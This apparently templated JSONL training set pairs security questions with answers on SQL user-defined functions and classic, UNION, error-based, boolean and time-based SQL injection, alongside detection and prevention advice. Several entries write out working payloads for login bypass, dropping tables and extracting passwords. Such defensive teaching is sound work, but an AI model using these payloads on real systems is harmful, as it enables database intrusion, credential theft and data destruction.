+{"id": "trtp-d082b9aeea33", "instruction": "How does SQL User-Defined Functions work and what are its security implications?", "output": "User-defined functions (UDFs) extend SQL with custom logic. They can be written in SQL or external languages. UDFs present security risks when they provide system access or execute with elevated privileges.\n\nSecurity Relevance: UDFs in languages like C can execute arbitrary code with database server privileges. Even SQL UDFs can encapsulate dangerous operations. Function libraries can hide malicious functionality.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086870Z", "updated_at": "2025-12-17T19:35:42.086870Z"}
+{"id": "trtp-2ebd67eff7a1", "instruction": "Describe the technical aspects of SQL User-Defined Functions.", "output": "SQL User-Defined Functions consists of the following key components:\n\n- Scalar functions (return single value)\n- Table-valued functions\n- Aggregate functions\n- Language options (SQL, PL/pgSQL, C, CLR)\n- Function volatility\n- Security definer vs invoker", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086890Z", "updated_at": "2025-12-17T19:35:42.086890Z"}
+{"id": "trtp-3e40a7c1cd22", "instruction": "Why is SQL User-Defined Functions important for database security?", "output": "UDFs in languages like C can execute arbitrary code with database server privileges. Even SQL UDFs can encapsulate dangerous operations. Function libraries can hide malicious functionality.\n\nCommon attack vectors include:\n- Malicious UDF for code execution\n- Privilege escalation through security-definer functions\n- Backdoor functions for persistence\n- Data exfiltration via function side effects", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086905Z", "updated_at": "2025-12-17T19:35:42.086905Z"}
+{"id": "trtp-5bb17eebfd3b", "instruction": "What are common attack techniques involving SQL User-Defined Functions?", "output": "Attack techniques involving SQL User-Defined Functions:\n\n- Malicious UDF for code execution\n- Privilege escalation through security-definer functions\n- Backdoor functions for persistence\n- Data exfiltration via function side effects\n\nDefenders can detect these attacks by:\n- Function inventory monitoring\n- External language function auditing\n- Function creation/modification alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086919Z", "updated_at": "2025-12-17T19:35:42.086919Z"}
+{"id": "trtp-524d285907f7", "instruction": "How can security teams detect attacks related to SQL User-Defined Functions?", "output": "Methods for detecting SQL User-Defined Functions attacks or anomalies:\n\n- Function inventory monitoring\n- External language function auditing\n- Function creation/modification alerts\n- Function execution patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086930Z", "updated_at": "2025-12-17T19:35:42.086930Z"}
+{"id": "trtp-2e4e88d7a271", "instruction": "What are best practices for preventing SQL User-Defined Functions?", "output": "Security controls and preventive measures for SQL User-Defined Functions:\n\n- Restrict function creation to trusted users\n- Disable external language functions when not needed\n- Use security-invoker mode by default\n- Regular function code review\n\nUDFs in languages like C can execute arbitrary code with database server privileges. Even SQL UDFs can encapsulate dangerous operations. Function libraries can hide malicious functionality.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086942Z", "updated_at": "2025-12-17T19:35:42.086942Z"}
+{"id": "trtp-36ebf2f2ddba", "instruction": "Show an example of SQL User-Defined Functions.", "output": "Example of SQL User-Defined Functions:\n\n```sql\nCREATE FUNCTION calculate_tax(amount DECIMAL) RETURNS DECIMAL AS $$ SELECT amount * 0.08 $$ LANGUAGE SQL;\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_fundamentals-sql-user-defined-functions", "license": "original", "retrieved_at": "2025-12-17T19:35:42.086808Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.086952Z", "updated_at": "2025-12-17T19:35:42.086952Z"}
+{"id": "trtp-9ae7b44b8632", "instruction": "How does Classic SQL Injection work and what are its security implications?", "output": "Classic SQL injection occurs when user input is concatenated directly into SQL queries. Attackers inject SQL syntax to modify query logic, bypass authentication, or extract data. It remains one of the most common and dangerous web vulnerabilities.\n\nSecurity Relevance: Classic SQL injection enables authentication bypass, data theft, privilege escalation, and potentially full system compromise. Despite being well-known for decades, it persists due to developer oversight and legacy code.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089108Z", "updated_at": "2025-12-17T19:35:42.089108Z"}
+{"id": "trtp-444de4afad76", "instruction": "What are the key components of Classic SQL Injection?", "output": "Classic SQL Injection consists of the following key components:\n\n- String concatenation in query building\n- Unescaped user input\n- Quote character handling\n- Comment sequences (--)\n- Statement termination (;)", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089128Z", "updated_at": "2025-12-17T19:35:42.089128Z"}
+{"id": "trtp-d2189d10e903", "instruction": "Why is Classic SQL Injection important for database security?", "output": "Classic SQL injection enables authentication bypass, data theft, privilege escalation, and potentially full system compromise. Despite being well-known for decades, it persists due to developer oversight and legacy code.\n\nCommon attack vectors include:\n- Authentication bypass: ' OR '1'='1'--\n- Query termination: '; DROP TABLE users;--\n- Comment injection: admin'--\n- String termination: ' OR 1=1--", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089161Z", "updated_at": "2025-12-17T19:35:42.089161Z"}
+{"id": "trtp-dceef4552c7d", "instruction": "What threats are associated with Classic SQL Injection?", "output": "Attack techniques involving Classic SQL Injection:\n\n- Authentication bypass: ' OR '1'='1'--\n- Query termination: '; DROP TABLE users;--\n- Comment injection: admin'--\n- String termination: ' OR 1=1--\n\nDefenders can detect these attacks by:\n- SQL keywords in user input (SELECT, UNION, OR)\n- Quote characters in parameters\n- Comment sequences in input", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089193Z", "updated_at": "2025-12-17T19:35:42.089193Z"}
+{"id": "trtp-5e18419da66d", "instruction": "How do you detect exploitation of Classic SQL Injection?", "output": "Methods for detecting Classic SQL Injection attacks or anomalies:\n\n- SQL keywords in user input (SELECT, UNION, OR)\n- Quote characters in parameters\n- Comment sequences in input\n- Database error messages in responses", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089231Z", "updated_at": "2025-12-17T19:35:42.089231Z"}
+{"id": "trtp-2c4e61d54b45", "instruction": "What security controls mitigate Classic SQL Injection risks?", "output": "Security controls and preventive measures for Classic SQL Injection:\n\n- Parameterized queries/prepared statements\n- Input validation with allowlists\n- Stored procedures with parameters\n- Least privilege database accounts\n\nClassic SQL injection enables authentication bypass, data theft, privilege escalation, and potentially full system compromise. Despite being well-known for decades, it persists due to developer oversight and legacy code.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089248Z", "updated_at": "2025-12-17T19:35:42.089248Z"}
+{"id": "trtp-63f6fa067699", "instruction": "Provide a code example for Classic SQL Injection.", "output": "Example of Classic SQL Injection:\n\n```sql\n-- Vulnerable code: \"SELECT * FROM users WHERE username='\" + input + \"'\";\n-- Attack: admin'--\n-- Result: SELECT * FROM users WHERE username='admin'--'\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-classic-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.089079Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.089259Z", "updated_at": "2025-12-17T19:35:42.089259Z"}
+{"id": "trtp-82453f8031f1", "instruction": "Describe UNION-Based SQL Injection and its role in database security.", "output": "UNION-based injection appends additional SELECT statements to extract data from other tables. The attacker must match the column count and data types of the original query. It's highly effective for data exfiltration.\n\nSecurity Relevance: UNION injection enables extraction of any accessible data, including credentials, personal information, and business secrets. A single successful injection can dump entire database contents.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091423Z", "updated_at": "2025-12-17T19:35:42.091423Z"}
+{"id": "trtp-87817f97f5a3", "instruction": "What elements make up UNION-Based SQL Injection?", "output": "UNION-Based SQL Injection consists of the following key components:\n\n- UNION SELECT operator\n- Column count enumeration\n- Data type matching\n- NULL-based discovery\n- ORDER BY enumeration", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091443Z", "updated_at": "2025-12-17T19:35:42.091443Z"}
+{"id": "trtp-485f077c8398", "instruction": "How can UNION-Based SQL Injection lead to database security incidents?", "output": "UNION injection enables extraction of any accessible data, including credentials, personal information, and business secrets. A single successful injection can dump entire database contents.\n\nCommon attack vectors include:\n- Column count: ORDER BY 1-- (increment until error)\n- NULL injection: UNION SELECT NULL,NULL,NULL--\n- Schema enumeration: UNION SELECT table_name,column_name FROM information_schema.columns--\n- Credential theft: UNION SELECT username,password FROM users--", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091458Z", "updated_at": "2025-12-17T19:35:42.091458Z"}
+{"id": "trtp-c86ba03ac075", "instruction": "What are common attack techniques involving UNION-Based SQL Injection?", "output": "Attack techniques involving UNION-Based SQL Injection:\n\n- Column count: ORDER BY 1-- (increment until error)\n- NULL injection: UNION SELECT NULL,NULL,NULL--\n- Schema enumeration: UNION SELECT table_name,column_name FROM information_schema.columns--\n- Credential theft: UNION SELECT username,password FROM users--\n\nDefenders can detect these attacks by:\n- UNION keyword in parameters\n- ORDER BY with numeric increments\n- information_schema queries", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091482Z", "updated_at": "2025-12-17T19:35:42.091482Z"}
+{"id": "trtp-4f8dfad8c1a1", "instruction": "What should analysts look for when monitoring for UNION-Based SQL Injection?", "output": "Methods for detecting UNION-Based SQL Injection attacks or anomalies:\n\n- UNION keyword in parameters\n- ORDER BY with numeric increments\n- information_schema queries\n- Response size anomalies", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091495Z", "updated_at": "2025-12-17T19:35:42.091495Z"}
+{"id": "trtp-6fb42ecb7ad8", "instruction": "What security controls mitigate UNION-Based SQL Injection risks?", "output": "Security controls and preventive measures for UNION-Based SQL Injection:\n\n- Parameterized queries eliminate UNION injection\n- Restrict information_schema access\n- Column-level permissions\n- Response size limits\n\nUNION injection enables extraction of any accessible data, including credentials, personal information, and business secrets. A single successful injection can dump entire database contents.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091507Z", "updated_at": "2025-12-17T19:35:42.091507Z"}
+{"id": "trtp-c9147e01b651", "instruction": "Show an example of UNION-Based SQL Injection.", "output": "Example of UNION-Based SQL Injection:\n\n```sql\n-- Column enumeration: ' ORDER BY 1,2,3,4--\n-- NULL test: ' UNION SELECT NULL,NULL,NULL--\n-- Data extraction: ' UNION SELECT username,password,NULL FROM users--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-union-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.091393Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.091518Z", "updated_at": "2025-12-17T19:35:42.091518Z"}
+{"id": "trtp-66dde63462dc", "instruction": "Describe Error-Based SQL Injection and its role in database security.", "output": "Error-based injection extracts data through database error messages. By crafting queries that cause specific errors, attackers force the database to reveal information in error output. Works when verbose errors are displayed.\n\nSecurity Relevance: Error-based injection extracts data even when UNION isn't viable. Error messages can reveal database version, table structure, and actual data values. It requires verbose error display but is highly reliable.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093866Z", "updated_at": "2025-12-17T19:35:42.093866Z"}
+{"id": "trtp-e3e2b38cfb6e", "instruction": "What elements make up Error-Based SQL Injection?", "output": "Error-Based SQL Injection consists of the following key components:\n\n- Database error message exposure\n- Type conversion errors\n- XML functions (EXTRACTVALUE, UPDATEXML)\n- Mathematical overflow errors\n- Subquery errors", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093886Z", "updated_at": "2025-12-17T19:35:42.093886Z"}
+{"id": "trtp-f585c9f8909e", "instruction": "What security risks are associated with Error-Based SQL Injection?", "output": "Error-based injection extracts data even when UNION isn't viable. Error messages can reveal database version, table structure, and actual data values. It requires verbose error display but is highly reliable.\n\nCommon attack vectors include:\n- EXTRACTVALUE: AND EXTRACTVALUE(1,CONCAT(0x7e,version()))\n- UPDATEXML: AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)\n- Type conversion: AND 1=CONVERT(int,(SELECT password FROM users))\n- Double query: AND 1=1 UNION SELECT 1,exp(~(SELECT * FROM (SELECT password)x))", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093901Z", "updated_at": "2025-12-17T19:35:42.093901Z"}
+{"id": "trtp-12ddc5fd775e", "instruction": "What attacks exploit Error-Based SQL Injection?", "output": "Attack techniques involving Error-Based SQL Injection:\n\n- EXTRACTVALUE: AND EXTRACTVALUE(1,CONCAT(0x7e,version()))\n- UPDATEXML: AND UPDATEXML(1,CONCAT(0x7e,(SELECT user())),1)\n- Type conversion: AND 1=CONVERT(int,(SELECT password FROM users))\n- Double query: AND 1=1 UNION SELECT 1,exp(~(SELECT * FROM (SELECT password)x))\n\nDefenders can detect these attacks by:\n- XML functions in parameters\n- CONVERT/CAST with subqueries\n- Database errors in response bodies", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093916Z", "updated_at": "2025-12-17T19:35:42.093916Z"}
+{"id": "trtp-e635d2c7a164", "instruction": "How can security teams detect attacks related to Error-Based SQL Injection?", "output": "Methods for detecting Error-Based SQL Injection attacks or anomalies:\n\n- XML functions in parameters\n- CONVERT/CAST with subqueries\n- Database errors in response bodies\n- exp() or mathematical functions with subqueries", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093929Z", "updated_at": "2025-12-17T19:35:42.093929Z"}
+{"id": "trtp-c9fdcb27c8cd", "instruction": "What security controls mitigate Error-Based SQL Injection risks?", "output": "Security controls and preventive measures for Error-Based SQL Injection:\n\n- Disable verbose error messages\n- Custom error pages without technical details\n- Parameterized queries\n- Log errors server-side only\n\nError-based injection extracts data even when UNION isn't viable. Error messages can reveal database version, table structure, and actual data values. It requires verbose error display but is highly reliable.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093942Z", "updated_at": "2025-12-17T19:35:42.093942Z"}
+{"id": "trtp-ed6c64fbb669", "instruction": "Provide a code example for Error-Based SQL Injection.", "output": "Example of Error-Based SQL Injection:\n\n```sql\n-- MySQL: ' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT password FROM users LIMIT 1)))--\n-- MSSQL: ' AND 1=CONVERT(int,(SELECT TOP 1 password FROM users))--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-error-based-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.093836Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.093952Z", "updated_at": "2025-12-17T19:35:42.093952Z"}
+{"id": "trtp-0054dffd8873", "instruction": "Explain Boolean-Based Blind SQL Injection from a security perspective.", "output": "Boolean-based blind injection infers data through application behavior differences when injecting true vs false conditions. Attackers extract data bit-by-bit by observing response variations without direct data output.\n\nSecurity Relevance: Boolean blind injection works when no direct output exists. Though slower than UNION attacks, automated tools can extract entire databases. It defeats applications that suppress errors but show behavioral differences.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096115Z", "updated_at": "2025-12-17T19:35:42.096115Z"}
+{"id": "trtp-ab981ef6f42c", "instruction": "What are the key components of Boolean-Based Blind SQL Injection?", "output": "Boolean-Based Blind SQL Injection consists of the following key components:\n\n- True/false condition testing\n- SUBSTRING/SUBSTR functions\n- ASCII/ORD character conversion\n- Binary search algorithm\n- Response differential analysis", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096136Z", "updated_at": "2025-12-17T19:35:42.096136Z"}
+{"id": "trtp-b70f1c0b3e41", "instruction": "What security risks are associated with Boolean-Based Blind SQL Injection?", "output": "Boolean blind injection works when no direct output exists. Though slower than UNION attacks, automated tools can extract entire databases. It defeats applications that suppress errors but show behavioral differences.\n\nCommon attack vectors include:\n- Condition testing: AND 1=1 (true) vs AND 1=2 (false)\n- Character guessing: AND SUBSTRING(username,1,1)='a'\n- Binary search: AND ASCII(SUBSTRING(password,1,1))>64\n- Length discovery: AND LENGTH(password)>10", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096151Z", "updated_at": "2025-12-17T19:35:42.096151Z"}
+{"id": "trtp-04cc12860f5b", "instruction": "What attacks exploit Boolean-Based Blind SQL Injection?", "output": "Attack techniques involving Boolean-Based Blind SQL Injection:\n\n- Condition testing: AND 1=1 (true) vs AND 1=2 (false)\n- Character guessing: AND SUBSTRING(username,1,1)='a'\n- Binary search: AND ASCII(SUBSTRING(password,1,1))>64\n- Length discovery: AND LENGTH(password)>10\n\nDefenders can detect these attacks by:\n- SUBSTRING/ASCII functions in parameters\n- Systematic true/false pattern probing\n- High request volume with similar patterns", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096164Z", "updated_at": "2025-12-17T19:35:42.096164Z"}
+{"id": "trtp-b27ceac4b142", "instruction": "How do you detect exploitation of Boolean-Based Blind SQL Injection?", "output": "Methods for detecting Boolean-Based Blind SQL Injection attacks or anomalies:\n\n- SUBSTRING/ASCII functions in parameters\n- Systematic true/false pattern probing\n- High request volume with similar patterns\n- Sequential character position testing", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096175Z", "updated_at": "2025-12-17T19:35:42.096175Z"}
+{"id": "trtp-d4d8f8bad943", "instruction": "How can organizations protect against Boolean-Based Blind SQL Injection?", "output": "Security controls and preventive measures for Boolean-Based Blind SQL Injection:\n\n- Parameterized queries\n- Consistent responses regardless of query results\n- Rate limiting\n- Input validation\n\nBoolean blind injection works when no direct output exists. Though slower than UNION attacks, automated tools can extract entire databases. It defeats applications that suppress errors but show behavioral differences.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096188Z", "updated_at": "2025-12-17T19:35:42.096188Z"}
+{"id": "trtp-9361b22e8752", "instruction": "What is the syntax for Boolean-Based Blind SQL Injection?", "output": "Example of Boolean-Based Blind SQL Injection:\n\n```sql\n-- True test: ' AND 1=1--\n-- False test: ' AND 1=2--\n-- Character extraction: ' AND SUBSTRING(password,1,1)='a'--\n-- ASCII extraction: ' AND ASCII(SUBSTRING(password,1,1))>97--\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-boolean-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.096086Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.096198Z", "updated_at": "2025-12-17T19:35:42.096198Z"}
+{"id": "trtp-def5e2cf8833", "instruction": "Explain Time-Based Blind SQL Injection from a security perspective.", "output": "Time-based blind injection extracts data by measuring response delays from conditional SLEEP or WAITFOR statements. When a condition is true, the query delays; when false, it returns immediately. Works even with completely static responses.\n\nSecurity Relevance: Time-based injection is the most reliable blind technique, working even when response content is identical. Network latency affects accuracy, but it defeats all response-based defenses.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098286Z", "updated_at": "2025-12-17T19:35:42.098286Z"}
+{"id": "trtp-808139a7bf12", "instruction": "What are the key components of Time-Based Blind SQL Injection?", "output": "Time-Based Blind SQL Injection consists of the following key components:\n\n- SLEEP() function (MySQL)\n- WAITFOR DELAY (SQL Server)\n- pg_sleep() (PostgreSQL)\n- BENCHMARK() for CPU delays\n- Conditional delay execution", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-time-based-blind-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.098250Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.098307Z", "updated_at": "2025-12-17T19:35:42.098307Z"}
